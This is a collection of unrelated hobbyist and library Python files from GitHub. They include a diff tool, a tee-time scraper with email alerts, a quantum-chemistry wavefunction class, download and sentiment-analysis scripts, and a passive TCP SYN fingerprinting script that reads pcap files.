+{"seq_id":"38062734170","text":"#!/usr/bin/env python3\r\nimport argparse\r\nimport numpy as np\r\nimport sys\r\nsys.path.append('../')\r\n\r\n\r\n\"\"\"\r\nThe script is mimicking the linux diff. It uses a algorithm\r\nfor finding the Longest Common Subsequence. Based on info\r\nabout the Longest Common Subsequence the script prints what\r\nis different between two input files. What is removed, added or\r\nchanged.\r\n\"\"\"\r\n\r\n\r\ndef __writeDiffToFile(diffOut):\r\n \"\"\"Function for writing the diff result to a text file.\r\n and prints out the diff result.\r\n Args:\r\n - diffOut (list): A list of all lines from the result\r\n of the diff algorithm.\r\n \"\"\"\r\n with open(\"diff_output.txt\", \"w+\") as out_file:\r\n for i in range(len(diffOut)):\r\n diff = diffOut.pop()\r\n out_file.write(diff)\r\n print(diff.rstrip())\r\n\r\n\r\ndef __writeSyntaxAndThemeToFile():\r\n \"\"\"Function for writing/making a diff syntax file,\r\n and a diff theme file.\r\n \"\"\"\r\n addedRegex = \"\\\"^(\\+.+)|(\\+)$\\\"\" + \": added\"\r\n removedRegex = \"\\\"^(\\-.+)|(\\-)$\\\"\" + \": removed\"\r\n\r\n with open(\"diff.syntax\", \"w+\") as out_file:\r\n out_file.write(addedRegex + \"\\n\")\r\n out_file.write(removedRegex + \"\\n\")\r\n\r\n with open(\"diff.theme\", \"w+\") as out_file:\r\n out_file.write(\"added: 0;\" + str(92) + \"\\n\")\r\n out_file.write(\"removed: 0;\" + str(31) + \"\\n\")\r\n\r\n print(\"\\n diff syntaxt and theme are written to files\")\r\n\r\n\r\ndef __readTextFromFile(filename):\r\n \"\"\"Function for reading a text file containing text to highlight\r\n Args:\r\n - filename (str): File location as string for the text file.\r\n Returns:\r\n lines (list): A list of strings for all lines read in file\r\n \"\"\"\r\n with open(filename, \"r\") as file:\r\n lines = file.readlines()\r\n return lines\r\n\r\n\r\ndef __lcsMatrix(original, changed):\r\n \"\"\"Builds the longest common subsequence (lcs) matrix from\r\n the input original file and the changed file.\r\n Args:\r\n - original (list): A list of all lines from the original file\r\n - changed (list): A list of all lines from the changed file\r\n Returns:\r\n matrix (numpy array): longest common subsequence matrix/array\r\n \"\"\"\r\n matrix = np.zeros((1+len(changed), 1+len(original)))\r\n for y in range(matrix.shape[0]-1): # lines in original\r\n ym = y + 1\r\n for x in range(matrix.shape[1]-1): # lines in changed\r\n xm = x + 1\r\n if (changed[y] == original[x]):\r\n diagonalValue = matrix[y][x]\r\n matrix[ym][xm] = diagonalValue + 1\r\n else:\r\n max_s_c = max(matrix[ym][xm - 1], matrix[ym - 1][xm])\r\n matrix[ym][xm] = max_s_c\r\n return matrix\r\n\r\n\r\ndef __lcsWithBacktracking(matrix, original, changed):\r\n \"\"\"Backtracking along the lcs matrix to find the longest common\r\n subsequence of lines and stores it. 
Using info from the matrix to\r\n    collect the correct lines (removed, added, or changed) from the two input\r\n    files.\r\n\r\n    Args:\r\n        - matrix (numpy array): Longest common subsequence matrix/array\r\n        - original (list): A list of all lines from the original file\r\n        - changed (list): A list of all lines from the changed file\r\n    Returns:\r\n        lcs, lcsLength, diffResult (tuple):\r\n\r\n        - lcs (str): A string representation of the longest common\r\n        subsequence.\r\n\r\n        - lcsLength (int): The length of the longest common subsequence\r\n\r\n        - diffResult (list): The entire diff result line-by-line stored\r\n        as strings in a list in the correct order.\r\n        Index corresponds to line nb.\r\n    \"\"\"\r\n    yp = matrix.shape[0] - 1\r\n    xp = matrix.shape[1] - 1\r\n    lcsLength = 0\r\n    lcs = \"\"\r\n    stack = []\r\n\r\n    diffResult = []\r\n    while True:\r\n        left = matrix[yp][xp - 1]\r\n        up = matrix[yp - 1][xp]\r\n        if((yp < 1) or (xp < 1)):\r\n            break\r\n        if (left == up):\r\n            if(matrix[yp][xp] == up):\r\n                yp -= 1  # move up the matrix\r\n                added = f\"+ {changed[yp]}\"\r\n                if (changed[yp] == \"\\n\"):\r\n                    added = f\"+ \\n\"\r\n                addedInChange = added\r\n                diffResult.append(addedInChange)\r\n            else:\r\n                common = original[xp-1]\r\n                diffResult.append(f\"0 {common}\")\r\n                stack.append(f\"0 {common}\")\r\n                lcsLength += 1\r\n                yp -= 1  # move diagonally up the matrix\r\n                xp -= 1  # move diagonally up the matrix\r\n        elif (left > up):  # move left the matrix\r\n            xp -= 1\r\n            removedFromoriginal = f\"- {original[xp]}\"\r\n            diffResult.append(removedFromoriginal)\r\n        elif (left < up):  # move up the matrix\r\n            yp -= 1\r\n            added = f\"+ {changed[yp]}\"\r\n            if(changed[yp] == \"\\n\"):\r\n                added = f\"+ \\n\"\r\n            addedInChange = added\r\n            diffResult.append(addedInChange)\r\n\r\n    # Fixes the last corner case. End in x or y in matrix\r\n    if(xp > 0):\r\n        for i in range(xp):\r\n            xp -= 1\r\n            removedFromoriginal = f\"- {original[xp]}\"\r\n            diffResult.append(removedFromoriginal)\r\n    elif(yp > 0):\r\n        for j in range(yp):\r\n            yp -= 1\r\n            added = f\"+ {changed[yp]}\"\r\n            if (changed[yp] == \"\\n\"):\r\n                added = f\"+ \\n\"\r\n            diffResult.append(added)\r\n\r\n    for j in range(len(stack)):\r\n        lcs += stack.pop()\r\n    return lcs, lcsLength, diffResult\r\n\r\n\r\ndef superdiff(originalFile, changedFile):\r\n    \"\"\"The function reads in text from two files, and\r\n    finds out what is different/changed in the changed file.\r\n    Finally it writes the difference to an output file.\r\n    Args:\r\n        - originalFile (str): File location as string for the\r\n        original file\r\n        - changedFile (str): File location as string for the\r\n        changed file\r\n    \"\"\"\r\n    original = __readTextFromFile(originalFile)\r\n    changed = __readTextFromFile(changedFile)\r\n    matrix = __lcsMatrix(original, changed)\r\n    lcs, lcsLength, diff = __lcsWithBacktracking(matrix, original, changed)\r\n    __writeDiffToFile(diff)\r\n    __writeSyntaxAndThemeToFile()\r\n\r\n\r\ndef main():\r\n    \"\"\"The main function uses argparser to get arguments.\r\n    Feeds the superdiff function\r\n    with arguments. 
Arguments are described in help.\r\n    \"\"\"\r\n    argparser = argparse.ArgumentParser()\r\n    argparser.add_argument('originalFile', type=str,\r\n                           help='File to check for changes against')\r\n    argparser.add_argument('changedFile', type=str,\r\n                           help='File to check for changes in')\r\n    args = argparser.parse_args()\r\n    superdiff(args.originalFile, args.changedFile)\r\n\r\n\r\nif __name__ == '__main__':\r\n    main()\r\n","repo_name":"AndreasBordvik/Regular-expression-modules","sub_path":"diff.py","file_name":"diff.py","file_ext":"py","file_size_in_byte":6818,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"26597814449","text":"print(\"\\n\\n\\n\");\n\nprint(\"Please choose the log-level (1-4)\\n\\n\"\n      \"1. EVENT\\n\"\n      \"2. WARN\\n\"\n      \"3. INFO\\n\"\n      \"4. DEBUG\\n\");\n\ntry:\n    level = int(input())\n\n    if( (level >= 1) and (level <= 4) ):\n        with open(\"log_level\", \"w\") as fp:\n            fp.write(str(level))\n\n        print(\"Log-Level changed successfully.\\n\\n\")\n\nexcept ValueError:\n    print(\"Invalid value entered, exiting .. \\n\\n\")\n","repo_name":"ajaygarg84/trafficshaper","sub_path":"tools/linux_desktop_i386/change_log_level.py","file_name":"change_log_level.py","file_ext":"py","file_size_in_byte":404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32509436298","text":"import requests\nfrom bs4 import BeautifulSoup\nimport smtplib\nimport time as t\nfrom password import password\n\n# Keep track of how many times program runs\ncounter = 0\n\nsender = 'conordurkin@me.com'\nreceiver = 'conordurkin@me.com'\n\nmessage_opening = \"\"\"From: \nTo: \nSubject: Muirfield has an opening!\n\nHi there - Muirfield has an opening for you!\nGo check it rather quickly before someone else snatches it up:\n\nhttps://www.muirfield.org.uk/visitors/?date=05/13/2021#booking\n\nGood luck.\n\n\"\"\"\n\nmessage_running = \"\"\"From: \nTo: \nSubject: Muirfield app is still running.\n\nNothing yet on Muirfield. 
Will keep checking.\n\n    \"\"\"\n\nwhile True:\n\n    # This is the code to check the website - if len(free) > 0, then a tee time is available.\n    page = requests.get(\"https://www.muirfield.org.uk/visitors/?date=05/13/2021#booking\")\n    soup = BeautifulSoup(page.content, features = 'html.parser')\n    free = soup.find_all('td', string = \"Yes\")\n    booked = soup.find_all('td', string = \"No\")\n    len(free)\n    len(booked)\n    counter += 1\n\n    if len(free) > 0:\n        # If time opens up, send me the \"Opening exists\" email, then stop checking the site.\n        smtpObj = smtplib.SMTP('smtp.mail.me.com', 587)\n        smtpObj.ehlo()\n        smtpObj.starttls()\n        smtpObj.login('conordurkin@me.com', password)\n        smtpObj.sendmail(sender, receiver, message_opening)\n        smtpObj.quit()\n        break\n\n    elif counter % 2 == 0:\n        # Every other check, send a heartbeat email, then wait 5 minutes before checking again.\n        smtpObj = smtplib.SMTP('smtp.mail.me.com', 587)\n        smtpObj.ehlo()\n        smtpObj.starttls()\n        smtpObj.login('conordurkin@me.com', password)  # use the imported password, not a hard-coded credential\n        smtpObj.sendmail(sender, receiver, message_running)\n        smtpObj.quit()\n        t.sleep(300)\n\n    else:\n        # If no times, wait 5 minutes, then check again.\n        t.sleep(300)\n","repo_name":"conordurkin/teetime","sub_path":"forlooptesting.py","file_name":"forlooptesting.py","file_ext":"py","file_size_in_byte":1931,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"1755309210","text":"from moha.system.wavefunction.base import BaseWaveFunction\nfrom moha.posthf.ci.ci_basis_set import CIBasisSet\n\nimport numpy as np \n\nclass CIWaveFunction(BaseWaveFunction):\n    \"\"\"Configuration interaction wavefunction class.\n\n    Attributes\n    ----------\n    nelec : int\n        Number of electrons.\n\n    occ : dict\n        Occupation number of the wavefunction.\n    \n    nspatial : int\n        Number of spatial orbitals.\n    \n    basis_set : Basis\n        Basis set of the wavefunction.\n    \n    coefficients : np.ndarray\n        Coefficients of the wavefunction.\n\n    Properties\n    ----------\n    ncoefficients : int\n        Number of coefficients.\n    \n    nspin : int\n        Number of spin orbitals\n    \n    spin : int\n        Spin of the wavefunction\n    \n    seniority: int\n        Seniority of the wavefunction\n\n    Methods\n    -------\n    __init__(self, nelec, nspatial, basis_set=None, coefficients=None)\n        Initialize the wavefunction.\n    \n    assign_nelec(self, nelec)\n        Assign the number of electrons.\n    \n    assign_nspatial(self, nspatial)\n        Assign the number of spatial orbitals.\n\n    assign_occ(self, occ)\n        Assign the occupation number of the wavefunction. \n    \n    assign_basis_set(self, basis_set)\n        Assign basis set of the wavefunction.\n    \n    assign_coefficients(self, coefficients)\n        Assign coefficients of the wavefunction.\n    \"\"\"\n\n    def __init__(self,nelec,nspatial,occ={},basis_set=None,coefficients=None):\n        \"\"\"Initialize the wavefunction.\n\n        Parameters\n        ----------\n        nelec : int\n            Number of electrons.\n        \n        nspin : int\n            Number of spin orbitals.\n        \n        occ : dict\n            Occupation number of the wavefunction.\n\n        dtype : {float, complex, np.float64, np.complex128, None}\n            Numpy data type.\n            Default is `np.float64`.\n        \n        memory : {float, int, str, None}\n            Memory available for the wavefunction.\n            Default does not limit memory usage (i.e. 
infinite).\n\n        \"\"\"\n        super().__init__(nelec,nspatial,occ,basis_set,coefficients)\n\n    @property\n    def configuration(self):\n        \"\"\"Return the configuration of the wavefunction.\n\n        Returns\n        -------\n        c : dict\n            Configuration of the wavefunction.\n        \"\"\"\n        c = {}\n        for spin in self.occ:\n            c[spin] = [1]*self.occ[spin] + [0]*(self.nspatial - self.occ[spin])\n        return c\n    \n    @property\n    def ncoefficients(self):\n        \"\"\"Return the number of wavefunction coefficients.\n\n        Returns\n        -------\n        ncoefficients : int\n            Number of coefficients.\n        \n        Raises\n        ------\n        TypeError\n            If coefficients is not a np.ndarray instance.\n        \"\"\"\n        if not isinstance(self.coefficients,np.ndarray):\n            raise TypeError(\"Coefficients is not a np.ndarray instance.\")\n        return self.coefficients.size\n    \n    @property\n    def seniority(self):\n        \"\"\"Return the seniority of the wavefunction.\n\n        Seniority of a Slater determinant is its number of unpaired electrons. The seniority of the\n        wavefunction is the expected number of unpaired electrons.\n\n        Returns\n        -------\n        seniority : int\n            Seniority of the wavefunction.\n\n        Notes\n        -----\n        `None` means that all possible seniorities are allowed.\n\n        \"\"\"\n        return None\n    \n    def assign_basis_set(self, basis_set):\n        \"\"\"Assign the basis_set of the wavefunction.\n\n        Parameters\n        ----------\n        basis_set \n            Basis set of the wavefunction.\n\n        Raises\n        ------\n        TypeError\n            If basis set is not a CIBasisSet instance. \n        \"\"\"\n        if not isinstance(basis_set,CIBasisSet):\n            raise TypeError(\"Basis set must be CIBasisSet instance.\")\n        self.basis_set = basis_set\n\n    def assign_coefficients(self, coefficients):\n        \"\"\"Assign the coefficients of the wavefunction.\n\n        Parameters\n        ----------\n        coefficients\n            Parameters of the wavefunction.\n\n        Raises\n        ------\n        TypeError\n            If coefficients is not a np.ndarray. 
\n \"\"\"\n if coefficients is None:\n coefficients = np.zeros((self.nspatial))\n elif not isinstance(coefficients,np.ndarray):\n raise TypeError(\"Coefficients is not a np.ndarray instance.\")\n self.coefficients = coefficients\n","repo_name":"ZhaoYilin/moha","sub_path":"moha/posthf/ci/ci_wavefunction.py","file_name":"ci_wavefunction.py","file_ext":"py","file_size_in_byte":4542,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"37"} +{"seq_id":"28107598373","text":"from setuptools import setup\nimport codecs\nimport os\nimport re\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\n# Read the version number from a source file.\n# Why read it, and not import?\n# see https://groups.google.com/d/topic/pypa-dev/0PkjVpcxTzQ/discussion\ndef find_version(*file_paths):\n # Open in Latin-1 so that we avoid encoding errors.\n # Use codecs.open for Python 2 compatibility\n with codecs.open(os.path.join(here, *file_paths), 'r', 'latin1') as f:\n version_file = f.read()\n\n # The version line must have the form\n # __version__ = 'ver'\n version_match = re.search(r\"^__version__ = ['\\\"]([^'\\\"]*)['\\\"]\",\n version_file, re.M)\n if version_match:\n return version_match.group(1)\n raise RuntimeError(\"Unable to find version string.\")\n\nsetup(name='slackclient',\n version=find_version('slackclient', 'version.py'),\n description='Python client for Slack.com',\n url='http://github.com/slackapi/python-slackclient',\n author='Ryan Huber',\n author_email='ryan@slack-corp.com',\n license='MIT',\n packages=['slackclient'],\n install_requires=[\n 'websocket-client',\n 'requests',\n 'six',\n ],\n zip_safe=False)\n","repo_name":"LaurentLouf/python-slackclient","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"23520954694","text":"import argparse\nimport os\nfrom huggingface_hub import hf_hub_download\n\ndef read_token_from_file(token_file_path):\n with open(token_file_path, 'r') as file:\n return file.read().strip()\n\ndef download_file_from_huggingface(repo_id, file_path, token=None, local_dir=None):\n try:\n # Downloading the file using hf_hub_download\n downloaded_data_path = hf_hub_download(\n repo_id=repo_id,\n filename=file_path,\n token=token,\n local_dir=local_dir,\n local_dir_use_symlinks=False\n )\n print(f'File downloaded successfully to: {downloaded_data_path}')\n except Exception as e:\n print(f'An error occurred while downloading the file: {str(e)}')\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description='Download a file from a HuggingFace repository.')\n parser.add_argument('--repo_id', type=str, required=True, help='Repository ID in HuggingFace.')\n parser.add_argument('--file_path', type=str, required=True, help='Path to the file in the repository.')\n parser.add_argument('--token', type=str, help='Path to the token file for private repositories.')\n parser.add_argument('--local_dir', type=str, default=\".\", help='Path to local directory to save the file.')\n\n args = parser.parse_args()\n\n if args.token:\n token = read_token_from_file(args.token)\n else:\n token = None\n\n download_file_from_huggingface(args.repo_id, args.file_path, token, args.local_dir)\n\n\n# python3 huggingface_download.py --repo_id=\"username/Dreambooth\" --file_path=\"filename.zip\" --token=\"/path/read_token.secret\" --local_dir 
\"/path_local/\"","repo_name":"curtwagner1984/stable_diffusion_tools","sub_path":"huggingface_download.py","file_name":"huggingface_download.py","file_ext":"py","file_size_in_byte":1658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"37"} +{"seq_id":"2802684920","text":"#Imports\nfrom scapy.all import sniff\nimport sys\n\n\nclass quirk:\n \"\"\"\n Creates quirks - comma-delimited properties and quirks observed in IP or TCP headers.\n If a signature scoped to both IPv4 and IPv6 contains quirks valid\n for just one of these protocols, such quirks will be ignored for\n on packets using the other protocol. For example, any combination\n of 'df', 'id+', and 'id-' is always matched by any IPv6 packet.\n \"\"\"\n\n def __init__(self, p):\n '''Takes a packet as an argument.'''\n self.p = p\n\n def __str__(self):\n return self.qstring\n\n @property\n def df(self):\n '''Sets df attribute based on flag - \"don't fragment\" set (probably PMTUD); ignored for IPv6.'''\n df = False\n version = self.p.version\n if version == 6:\n return False\n else:\n if 'DF' in self.p['IP'].flags.names:\n df = 'df'\n return df\n\n @property\n def id_plus(self):\n '''Sets id+ attribute based on flag and IPID - DF set but IPID non-zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n id_plus = False\n if self.p['IP'].flags =='DF' and self.p['IP'].id != 0:\n id_plus = 'id+'\n return id_plus\n\n @property\n def id_minus(self):\n '''Sets id- attribute based on flag and IPID - DF not set but IPID is zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n id_minus = False\n if self.p['IP'].flags =='DF' and self.p['IP'].id == 0:\n id_minus = 'id-'\n return id_minus\n\n @property\n def ecn(self):\n '''Sets ecn attribute - explicit congestion notification support.'''\n ecn = False\n if 'E' in self.p['TCP'].flags:\n ecn = 'ecn'\n return ecn\n\n @property\n def zero_plus(self):\n '''Sets 0+ Attribute - \"must be zero\" field not zero; ignored for IPv6.'''\n version = self.p.version\n if version == 6:\n return False\n else:\n zero_plus = False\n if self.p.reserved != 0:\n zero_plus = '0+'\n return zero_plus\n\n @property\n def flow(self):\n '''Sets flow Attribute - non-zero IPv6 flow ID; ignored for IPv4.'''\n #TODO IPv6 support\n return False\n\n @property\n def seq_minus(self):\n '''Sets seq- attribute - sequence number is zero.'''\n seq_minus = False\n if self.p['TCP'].seq == 0:\n seq_minus = 'seq-'\n return seq_minus\n\n @property\n def ack_plus(self):\n '''Sets ack+ - ACK number is non-zero, but ACK flag not set.'''\n ack_plus = False\n if self.p['TCP'].ack != 0:\n ack_plus = 'ack+'\n return ack_plus\n\n @property\n def ack_minus(self):\n '''Sets ack- - ACK number is zero, but ACK flag set.'''\n ack_minus = False\n if self.p['TCP'].ack == 0:\n ack_minus = 'ack-'\n return ack_minus\n\n @property\n def uptr_plus(self):\n '''Sets uptr+ attribute - URG pointer is non-zero, but URG flag not set.'''\n uptr_plus = 'uptr+'\n return uptr_plus\n\n @property\n def urgf_plus(self):\n '''Sets urgf+ attribute - URG flag used.'''\n urgf_plus = False\n if 'URG' in self.p['IP'].flags:\n urgf_plus = 'urgf+'\n return urgf_plus\n\n @property\n def pushf_plus(self):\n '''Sets pushf+ attribute - PUSH flag used.'''\n pushf_plus = False\n if 'PUSH' in self.p['IP'].flags:\n pushf_plus = 'pushf+'\n return pushf_plus\n\n @property\n def ts1_minus(self):\n '''Sets ts1- attribute - own timestamp specified as zero.'''\n ts1_minus = 
False\n try:\n ts1 = dict(self.p['TCP'].options)\n if ts1['Timestamp'][0] == 0:\n ts1_minus = 'T0'\n except:\n pass\n return ts1_minus\n\n @property\n def ts2_plus(self):\n '''Sets ts2+ attribute - non-zero peer timestamp on initial SYN.'''\n ts2_plus = False\n try:\n ts2 = dict(self.p['TCP'].options)\n if ts2['Timestamp'][1] != 0:\n ts2_plus = 'T'\n except:\n pass\n return ts2_plus\n\n @property\n def opt_plus(self):\n '''Sets opt+ attribute - trailing non-zero data in options segment.'''\n opt_plus = False\n return opt_plus\n\n @property\n def exws(self):\n '''Sets exws attribute - excessive window scaling factor (> 14).'''\n try:\n exws = dict(self.p['TCP'].options)\n except:\n exws = False\n if exws != False:\n try:\n exws = exws['WScale'] >= 14\n return exws\n except:\n pass\n else:\n return False\n\n @property\n def bad(self):\n '''Sets bad attribute - malformed TCP options.'''\n bad = isinstance(self.p['TCP'].options, list)\n return False\n\n @property\n def qstring(self):\n '''Looks at all attributes and makes quirks.'''\n quirks = []\n if self.df: quirks.append(self.df)\n if self.id_plus: quirks.append(self.id_plus)\n if self.id_minus: quirks.append(self.id_minus)\n if self.ecn: quirks.append(self.ecn)\n if self.zero_plus: quirks.append(self.zero_plus)\n if self.flow: quirks.append(self.flow)\n if self.seq_minus: quirks.append(self.seq_minus)\n if self.ack_plus: quirks.append(self.ack_plus)\n if self.ack_minus: quirks.append(self.ack_minus)\n if self.uptr_plus: quirks.append(self.uptr_plus)\n if self.urgf_plus: quirks.append(self.urgf_plus)\n if self.pushf_plus: quirks.append(self.pushf_plus)\n if self.ts1_minus: quirks.append(self.ts1_minus)\n if self.ts2_plus: quirks.append(self.ts2_plus)\n if self.opt_plus: quirks.append(self.opt_plus)\n if self.exws: quirks.append(self.exws)\n if self.bad: quirks.append(self.bad)\n quirks = \",\".join(quirks)\n return quirks\n\n\nclass signature:\n \"\"\"\n Data mapping class that takes a TCP Signature object and inserts it into the sqlite database.\n \"\"\"\n def __init__(self, p):\n self.p = p\n\n def process_options(option):\n if option[0] == 'MSS' and (option[1] == 0 or option[1] == ''):\n return 'M*'\n elif option[0] == 'MSS' and option[1] > 1:\n return 'M' + str(option[1])\n elif option[0] == 'NOP':\n return 'N'\n elif option[0] == 'WScale':\n return 'W' + str(option[1])\n elif option[0] == 'SAckOK':\n return 'S'\n elif option[0] == 'EOL':\n return 'E'\n else:\n #TODO\n # The p0f docs state:\n # ?n - unknown option ID n\n # What does that even mean?\n # Then to make things even more vague\n # some random documentation on cert.org states:\n # ?n - unrecognized option number n.\n # Soooooo, unrecognized != unknown\n # I came up with the following and the output does not look correct. \\\n # We went with literally returning '?n'\n # return '?' + str(option[1])\n return '?n'\n\n @property\n def version(self):\n '''Signature for IPv4 ('4'), IPv6 ('6'), or both ('*').'''\n version = self.p.version\n return str(version)\n\n @property\n def ittl(self):\n '''\n Initial TTL used by the OS. Almost all operating systems use\n 64, 128, or 255; ancient versions of Windows sometimes used\n 32, and several obscure systems sometimes resort to odd values\n such as 60.\n\n NEW SIGNATURES: P0f will usually suggest something, using the\n format of 'observed_ttl+distance' (e.g. 54+10). Consider using\n traceroute to check that the distance is accurate, then sum up\n the values. 
If initial TTL can't be guessed, p0f will output\n        'nnn+?', and you need to use traceroute to estimate the '?'.\n\n        A handful of userspace tools will generate random TTLs. In these\n        cases, determine maximum initial TTL and then add a - suffix to\n        the value to avoid confusion.\n        '''\n        if self.version == '4':\n            ittl = self.p['IP'].ttl\n        elif self.version == '6':\n            ittl = self.p['IPv6'].hlim\n        else:\n            ittl = ''\n        return ittl\n\n    @property\n    def olen(self):\n        '''\n        Length of IPv4 options or IPv6 extension headers. Usually zero\n        for normal IPv4 traffic; always zero for IPv6 due to the\n        limitations of libpcap.\n        '''\n        if self.version == '4':\n            olen = len(self.p['IP'].options)\n        elif self.version == '6':\n            olen = 0\n        else:\n            olen = ''\n        return str(olen)\n\n    @property\n    def mss(self):\n        '''\n        maximum segment size, if specified in TCP options. Special value\n        of '*' can be used to denote that MSS varies depending on the\n        parameters of sender's network link, and should not be a part of\n        the signature. In this case, MSS will be used to guess the\n        type of network hookup according to the [mtu] rules.\n\n        NEW SIGNATURES: Use '*' for any commodity OSes where MSS is\n        around 1300 - 1500, unless you know for sure that it's fixed.\n        If the value is outside that range, you can probably copy it\n        literally.\n        '''\n        mss = dict(self.p['TCP'].options)\n        try:\n            return str(mss['MSS'])\n        except:\n            return '*'\n\n    @property\n    def window_size(self):\n        '''\n        Window size. Can be expressed as a fixed value, but many\n        operating systems set it to a multiple of MSS or MTU, or a\n        multiple of some random integer. P0f automatically detects these\n        cases, and allows notation such as 'mss*4', 'mtu*4', or '%8192'\n        to be used. Wildcard ('*') is possible too.\n        '''\n        window_size = self.p['TCP'].window\n        if self.mss != '*':\n            if (self.p['TCP'].window / int(self.mss)).is_integer():\n                window_size = \"mss*\" + str(int(self.p['TCP'].window / int(self.mss)))\n        return str(window_size)\n\n    @property\n    def scale(self):\n        '''\n        Window scaling factor, if specified in TCP options. Fixed value\n        or '*'.\n        NEW SIGNATURES: Copy literally, unless the value varies randomly.\n        Many systems alter between 2 or 3 scaling factors, in which case,\n        it's better to have several 'sig' lines, rather than a wildcard.\n        '''\n        options = dict(self.p['TCP'].options)\n        try:\n            return options['WScale']\n        except:\n            return '*'\n\n    @property\n    def olayout(self):\n        '''\n        comma-delimited layout and ordering of TCP options, if any. This\n        is one of the most valuable TCP fingerprinting signals. Supported\n        values.\n        '''\n        if len(self.p['TCP'].options) == 0:\n            return '*'\n        else:\n            loo = []\n            for i in self.p['TCP'].options:\n                loo.append(signature.process_options(i))\n            return ','.join(map(str, loo))\n\n    @property\n    def quirk(self):\n        '''\n        Comma-delimited properties and quirks observed in IP or TCP\n        headers.\n        '''\n        q = quirk(self.p)\n        return str(q)\n\n    @property\n    def pclass(self):\n        '''\n        Payload size classification: '0' for zero, '+' for non-zero,\n        '*' for any. The packets we fingerprint right now normally have\n        no payloads, but some corner cases exist.\n        '''\n        pclass = len(self.p['TCP'].payload)\n        if pclass != 0:\n            pclass = '+'\n        return str(pclass)\n\n    @property\n    def qstring(self):\n        qstring = \"{ver}:{ittl}:{olen}:{mss}:{wsize}:{scale}:{olayout}:{quirk}:{pclass}\".format(ver=self.version, ittl=self.ittl, olen=self.olen, mss=self.mss, wsize=self.window_size, scale=self.scale, olayout=self.olayout, quirk=self.quirk, pclass=self.pclass)\n        return qstring\n\n    def __str__(self):\n        return self.qstring\n\n\n\n# SNIFFFFFFFFING\n############################################\n# Takes the packets and only looks at SYNs\npcap = sys.argv[1:].pop()\npackets = sniff(offline=pcap, filter=\"tcp[tcpflags] & tcp-syn != 0\")\n\n# Extracts the signature\nfor i in packets:\n    packet_signature = signature(i)\n    print(\"\\n\\nSignature Identified for: {IP} --> {signature}\".format(IP=i['IP'].src, signature=str(packet_signature)))","repo_name":"but-i-am-dominator/fingerprint_pull","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":12779,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"22536850471","text":"from __future__ import print_function\n\nimport argparse\nimport json\nimport os\nimport tempfile\nimport csv\n\nfrom rosette.api import API, DocumentParameters, RosetteException\nurlPrefix = 'https://www.reuters.com'\n\n\ndef run(key, url, alt_url='https://api.rosette.com/rest/v1/'):\n    \"\"\" Run the example \"\"\"\n    # Create default file to read from\n    \n\n    # Create an API instance\n    api = API(user_key=key, service_url=alt_url)\n\n    params = DocumentParameters()\n    params[\"language\"] = \"eng\"\n    params[\"contentUri\"] = url\n\n    # Use an HTML file to load data instead of a string\n    #params.load_document_file(temp_file.name)\n    result = None\n    try:\n        result = api.sentiment(params)\n\n    except RosetteException as exception:\n        print(exception)\n    finally:\n        # Clean up the file\n        #temp_file.close()\n        \n        return result\n\n\nPARSER = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter,\n                                 description='Calls the ' +\n                                 os.path.splitext(os.path.basename(__file__))[0] + ' endpoint')\nPARSER.add_argument('-k', '--key', help='Rosette API Key', required=True)\nPARSER.add_argument('-u', '--url', help=\"Alternative API URL\",\n                    default='https://api.rosette.com/rest/v1/')\n\ndef extractUrl(ARGS):\n    newlist = []\n    filename = 'test.csv'\n    with open(filename, 'rU') as csvfile:\n        reader = csv.DictReader(csvfile)\n        for row in reader:\n            date = str(row['date'])\n            url = urlPrefix + str(row['url'])\n            print(url)\n            RESULT = run(ARGS.key, url, ARGS.url)\n            data = json.loads(json.dumps(RESULT, indent=2, ensure_ascii=False,\n                                         sort_keys=True).encode(\"utf8\"))\n\n            entityLabel = ''\n            conf = ''\n            for entity in data['entities']:\n                if entity['mention'] == 'Apple' :\n                    entityLabel = entity['sentiment']['label']\n                    conf = entity['sentiment']['confidence']\n\n            newlist.append({\n                'date' : date,\n                'label' : data['document']['label'],\n                'confidence' : data['document']['confidence'],\n                'entity-label' : entityLabel,\n                'entity-confidence' : conf\n                #'entityLabel' : data['entity']\n            })\n    return newlist\n\n\nif __name__ == '__main__':\n    out = 'result4001-end.csv'\n    ARGS = PARSER.parse_args()\n    #url = 'https://www.reuters.com/article/petriepartners-rothschild/rothschild-petrie-partners-form-energy-restructuring-partnership-idUSL1N13I1HA20151123'\n    #extractUrl()\n    \n    finalResult = extractUrl(ARGS)\n    \n    #we only care about 
confidence and label here\n    with open(out, \"wb\") as csvfile:\n        fieldnames = ('date', 'label', 'confidence', 'entity-label', 'entity-confidence')\n        writer = csv.DictWriter(csvfile, fieldnames = fieldnames)\n        writer.writeheader()\n        \n        for row in finalResult: \n            writer.writerow(row)","repo_name":"runzhoucao/Columbia-COMS4995-StockPrediction","sub_path":"SentimentAnalysis/getSentimentScore.py","file_name":"getSentimentScore.py","file_ext":"py","file_size_in_byte":3007,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"28720251191","text":"\n# Return true if the given non-negative number is a multiple of 3 or 5, but not both.\n\n\n# old35(3) → true\n# old35(10) → true\n# old35(15) → false\n\ndef old35(n):\n\n\tif n%5==0 and n%3==0:\n\t\treturn False\n\n\n\telif n%5==0 or n%3==0:\n\t\treturn True\n\n\treturn 